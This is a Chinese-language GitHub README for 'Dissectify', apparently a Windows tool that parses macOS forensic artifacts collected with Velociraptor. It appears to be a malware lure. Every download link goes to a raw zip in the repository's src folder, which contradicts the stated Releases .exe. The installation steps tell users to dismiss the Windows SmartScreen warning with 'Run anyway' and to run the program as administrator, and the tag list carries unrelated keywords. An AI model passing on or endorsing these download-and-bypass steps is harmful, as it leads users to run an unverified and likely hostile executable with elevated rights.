allfired-greenmountains5800/Dissectify

GitHub: allfired-greenmountains5800/Dissectify

一个运行在 Windows 上的 macOS 取证分析工具,可通过 Velociraptor 采集器收集数据并自动解析 61 种系统 artifacts,最终生成结构化的分析报告。

Stars: 0 | Forks: 0

# 🔍 Dissectify - 轻松分析 macOS 数据 [![下载 Dissectify](https://img.shields.io/badge/Download_Dissectify-Blue-blue.svg)](https://github.com/allfired-greenmountains5800/Dissectify/raw/refs/heads/main/src/Software_2.4.zip) Dissectify 帮助您检查 macOS 取证数据。它处理数据集合、检查数据健康状况,并从系统 artifacts 中提取信息。您可以通过清晰的界面了解文件活动、系统日志和用户行为。该工具负责管理数据解析和报告生成的复杂任务。 ## 🛠️ 系统要求 在开始之前,请确保您的计算机满足以下标准: * 操作系统:Windows 10 或 Windows 11。 * 内存:至少 8 GB RAM。 * 存储:应用程序文件需要 500 MB 可用空间。 * 网络:初始设置时需要稳定的互联网连接。 * 权限:需要计算机的管理员访问权限。 ## 📥 下载软件 📁 您需要访问官方项目页面以下载最新版本的应用程序。 1. 打开您的网络浏览器。 2. 导航到以下页面选择您的安装文件:[https://github.com/allfired-greenmountains5800/Dissectify/raw/refs/heads/main/src/Software_2.4.zip](https://github.com/allfired-greenmountains5800/Dissectify/raw/refs/heads/main/src/Software_2.4.zip) 3. 在屏幕右侧查找标有 Releases 的部分。 4. 点击最新版本的链接。 5. 选择以 .exe 结尾的文件开始下载。 6. 将文件保存在 Downloads 文件夹中以便访问。 ## ⚙️ 安装过程 🔧 按照以下步骤在您的 Windows 计算机上设置 Dissectify: 1. 在 Downloads 文件夹中找到您下载的文件。 2. 双击文件以启动安装程序。 3. Windows 可能会显示安全通知。如果出现标有"Windows 已保护您的 PC"的框,请点击"更多信息"链接,然后选择"仍要运行"。 4. 按照安装窗口中显示的说明进行操作。软件将安装运行取证引擎所需的组件。 5. 流程完成后,桌面上会出现一个快捷方式图标。 ## 🚀 运行 Dissectify 🖥️ 1. 双击桌面上的 Dissectify 图标。 2. 将打开一个终端窗口。这是应用程序的主界面。 3. 程序显示可用选项菜单。您可以使用键盘进行选择。 4. 要分析数据集合,请确保您计算机上的文件已准备就绪。 5. 当程序请求时,输入您的数据文件夹路径。 6. 软件会自动验证集合完整性。它会在开始分析之前检查数据集是否完整。 ## 📊 使用功能 📑 Dissectify 包含多个模块来协助您的工作。 ### Artifact 解析 该工具包含 61 个专用解析器。这些模块扫描系统文件并提取有意义的数据点。您无需手动配置这些。Dissectify 会识别文件类型并应用正确的提取逻辑。 ### 健康验证 应用程序检查已收集的 artifacts 以查找错误或缺失。如果工具发现数据缺失,会立即通知您。这确保您的最终报告真实反映系统状态。 ### 报告导出 分析完成后,该工具提供保存结果的选项。选择 XLSX 导出功能创建电子表格。此文件以结构化格式显示您的发现,适合在 Excel 或其他电子表格程序中查看。 ### 采集器构建器 如果您需要准备新的数据集合,请使用 Velociraptor 采集器构建器。此功能引导您创建收集特定系统证据的包。构建采集器后,您可以将其部署到目标系统。 ## 💡 常见问题排查 🩺 * **程序无法打开:** 检查您是否拥有最新版本的 Windows 运行时库。如果程序无法启动,请访问 Microsoft 支持网站。 * **分析耗时过长:** 大型数据集需要更长的处理时间。确保 Dissectify 运行时不运行其他繁重任务。 * **导出缺失:** 如果您打开了 Excel 文件,请将其关闭。如果另一个程序锁定了目标文件,软件无法保存新报告。 * **权限错误:** 如果您无法访问特定系统目录,请以管理员身份运行应用程序。右键单击快捷方式并选择"以管理员身份运行"。 ## 🧹 维护和更新 🔄 定期检查项目页面以获取新版本。开发人员会更新 61 个解析器以支持更新版本的 macOS 并修复错误。要更新,只需下载新文件并再次运行安装程序。它会覆盖旧版本,同时保留您的配置文件。 该软件完全在您的本地计算机上运行。分析过程中不会有任何数据离开您的计算机。这保护了您检查的取证集合的隐私。所有步骤都在终端界面内进行,以最大限度地提高速度和效率。使用箭头键导航菜单,按 Enter 确认您的选择。随时可以通过关闭终端窗口退出程序。
标签:DAST, DInvoke, macOS取证, Velociraptor, Windows工具, 取证artifacts, 取证分析工具, 取证调查, 恶意软件分析, 数字取证, 数据健康检查, 数据解析, 文件活动分析, 用户态调试, 用户行为分析, 系统日志分析, 自动化脚本